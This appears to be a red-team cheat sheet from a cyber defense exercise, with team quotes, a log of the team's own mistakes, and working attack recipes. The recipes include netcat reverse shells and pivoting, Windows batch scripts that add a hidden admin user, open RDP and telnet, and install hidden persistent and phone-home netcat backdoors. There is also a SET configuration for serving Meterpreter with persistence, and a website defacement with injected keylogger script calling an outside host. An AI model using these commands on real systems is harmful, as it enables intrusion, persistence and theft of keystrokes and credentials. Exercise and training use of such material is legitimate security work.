master
CDX-RC-Docs
Feel free to pull this doc to add, update, correct it
s#!thackersay
-
whack back doublebackwhack - n00bfac3
-
I’m touching it the wrong way - moose
-
every cloud has a cyber lining - bryfry
-
I’m taking an fgdump all over this - dub
-
It’s Mudge’s little thing keeping us in there! - dub
-
I cannot have enough shells right now, it’s ridiculous! Shells on shells on shells! Shells gone wild! - moose
-
I cacl’d it up in there! - n00bfac3
-
dub: The G-Spot is going to be beaconing
bryfry: You should come up with another word for beaconing.
-
You just dumped your own hashes - d1
-
It’s very very hung - dub
-
21:45:45 <Mr.T> I tty the foo -
Yeah, you can’t control-C… - moose
-
It wasn’t a stupid question–it’s the middle of the night…literally! - n00bfac3
-
The question is NO - moose
-
hash-bang explana-brag! - bryfry
-
I’m going to insert the trojan in the box, drop my payload, and spawn so many child processes - mstaint
Bad Red Cell Hat Log
- Rookie4U scanned from armitage server.
- Rookie4U scanned from armitage server again.
- and again.
- Mudge egressed on 21
- p0nyExpr3ss exploited from armitage server
- bryfry posted red team SSH keys to public drop box
- (honorary) Cmdr Odom grabbed passwd/shadow … of local machine (GET FTW)
Media
Screenshots & Photos: http://goo.gl/MVeB3
Armitage
Client Setup
- Host:
<armitage server ip> - Port:
55553 - User:
msf - Pass:
<password>
Server Setup
# get the teamserver startup script that doesnt come on bt5 rc2
cd /opt/metasploit/msf3/data/armitage
wget http://armitage.googlecode.com/svn-history/r737/trunk/release/armitage-unix/teamserver
chmod a+x teamserver
# start the server
./teamserver <external ip> <password>
NetCat
Server (listener):
ncat <ip> <port> -klvm 1
Client:
nc <server ip> <port> -e /bin/bash 1>/dev/null 2>/dev/null &
Upgrade from nc shell to terminal-ish:
python -c 'import pty; pty.spawn("/bin/sh")
nc Pivoting with Named Pipes
### Setup ###
+-----------------+ +----------------+ +----------------+
| attacker | | nc pivot | | target |
|-----------------| |----------------| |----------------|
| | | | | |
| attacker net |<-------| target net | | target net |
| | nc | | | |
+-----------------+ +----------------+ +----------------+
### Execute ###
nc pivot $ mknod x p
+-----+ $ nc <attacker ip> 443 < x | nc <target ip> 445 > x
| msf |
+-----+ attacker $ mknod y p
| $ nc -klp 443 < y | nc -klp 1234 > y
v
+-----------------+ +----------------+ +----------------+
| | attacker | | nc pivot | | target |
|-----------------| |----------------| |----------------|
| | | | | | |
| | +->|<------>|-----> x ------>|-------->| :( |
| v | | | | | |
+--------------+--+ +----------------+ +----------------+
1234 443
^ ^
| localhost |
+--> y <--+
Port Knocking to initiate nc with iptables
iptables: watch for tcp connection on <port>
sudo iptables -A INPUT -p tcp --dport <port> -j LOG --log-prefix="token <port>"
Watch log for token
tail -f /var/log/messages | awk '/token <port>/ {system("/sbin/netplugd-ng <port>")}' &
Windows
Change user desktop
reg add "hkcu\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
reg add "hkcu\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\[LOCATION OF WALLPAPER]" /f
reg delete "hkcu\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
reg add "hkcu\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
Windows .bat runs token_util.exe
save following code into younameit.bat
@echo off
start "" "C:\TOKEN_AGENT\token_agent_cxfreeze\token_util.exe"
Add new user
@echo Adding new user...
net user WindowsAssistance P@ssw0rd /add
@echo Adding new user to Admin and Remote access groups...
net localgroup Administrators WindowsAssistance /add
net localgroup "Remote Desktop Users" WindowsAssistance /add
Hide user from Welcome screen
@echo Hiding new user from welcome screen...
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v WindowsAssistance /t REG_DWORD /d 0 /f
Enable RDP
@echo Enabling Remote Desktop Service and opening firewall port...
netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
Enable Telnet
@echo Enabling telnet and opening port...
sc config tlntsvr start= auto
net start telnet
netsh firewall add portopening TCP 23 Telnet
Install Persistent NetCat Listener
@echo Installing persistent netcat listener...
copy znc.exe %SYSTEMROOT%
echo znc.exe -L -p %BACKDOOR_PORT% -d -e cmd.exe > Windows-Backup.bat
copy Windows-Backup.bat "%USERPROFILE%\Start Menu\Programs\Startup"
attrib +R +H "%USERPROFILE%\Start Menu\Programs\Startup\Windows-Backup.bat"
attrib +R +H Windows-Backup.bat
netsh firewall add portopening TCP %BACKDOOR_PORT% Windows-Backup
NetCat Caller
@echo Creating phone-home task...
echo ECHO OFF > %SYSTEMROOT%\service.bat
echo znc.exe %NCL% 8080 -d -e cmd.exe >> %SYSTEMROOT%\service.bat
attrib +R +H %SYSTEMROOT%\service.bat
schtasks /create /RU RemoteAssistance /RP P@ssw0rd /SC MINUTE /MO 5 /TN Backup /TR "service.bat"
schtasks /change /tn Backup /ru ""
See Windows sessions and kill one
C:\windows\system32\dllcache\quser.exe
logoff <sessionid>
Wiggle da mouse! (kill the screensaver)
taskkill /f /im logon.scr
NET USER using IPv6
net use X: \\2001-dbb-c18-555-f8d9-a1ea-b86e-10ad.ipv6-literal.net\SYSVOL /user:scorebot Dinosaur2
Misc. Tools / Tricks
DNS Zone Transfers
dnstz.rb
#!/usr/bin/env ruby
teams = [
['10.1.20.5','usafa.bluenet'],
['10.1.30.5','afit1.bluenet'],
['10.1.40.5','uscga.bluenet'],
['10.1.50.5','usmma.bluenet'],
['10.1.60.5','usma.bluenet'],
['10.1.70.5','usna.bluenet'],
['10.1.80.5','afit2.bluenet'],
['10.1.90.5','nps.bluenet'],
['10.1.100.5','rmc.bluenet']
]
teams.each do |team|
dump = %x[dig -t AXFR #{team[1]} @#{team[0]} +time=1]
puts dump
end
Wireshark of Remote Host
This will run a tcpdump on a remote host and pipe the results through ssh back to your local host and show it in wireshark.
ssh <user>@<remote ip> tcpdump -U -s0 -w - 'not port 22' | wireshark -k -i -
Create a malware serving website with SET
cd /pentest/exploit/set
edit /pentest/exploit/set/config/set_config
METERPRETER_MULTI_SCRIPT=ON
METERPRETER_MULTI_COMMANDS= run persistence -r 10.2.222.222 -p 443 -P windows/meterpreter/reverse_https -i 5 -X -A -U
AUTO_DETECT=ON
APACHE_SERVER=ON
APACHE_DIRECTORY=/var/www
SELF_SIGNED_APPLET=ON
JAVA_ID_PARAM=Secure CDX Java App #or whatever you want
AUTOMATIC_LISTENER=ON
Start set: ./set
1) Social-Engineering Attacks
2) Website Attack Vectors
1) Java Applet Attack Method
Clone or Template
Input your web server external IP
9) Windows Meterpreter Reverse HTTPS
16) Backdoored Executable
Default listener port [443]
Get a dns entry created for your website
Sit back and wait patiently
USAFA Website Defacement / Keylogger
The open door
<script type="text/javascript" src="http://code.jquery.com/jquery-1.7.1.min.js"></script>
The site defacement
define=="function"&&define.amd&&define.amd.jQuery&&define("jquery",[],function(){return f})})(window);
jQuery(document).ready(function() { jQuery("td a img").first().attr("src", "http://www.whitehouse.com/jb7.jpg").attr("width", 128).attr("height", 200).attr("alt", "boys, this is what you're fighting for");
jQuery(".boardtitle").text("Boys, this is what you're fighting for");
The Keylogger
jQuery("body").append("<script SRC=\"http://10.2.36.5:443/analytics/test.js\"></script>"); });
js created with: msf> use auxiliary/server/capture/http_javascript_keyloggera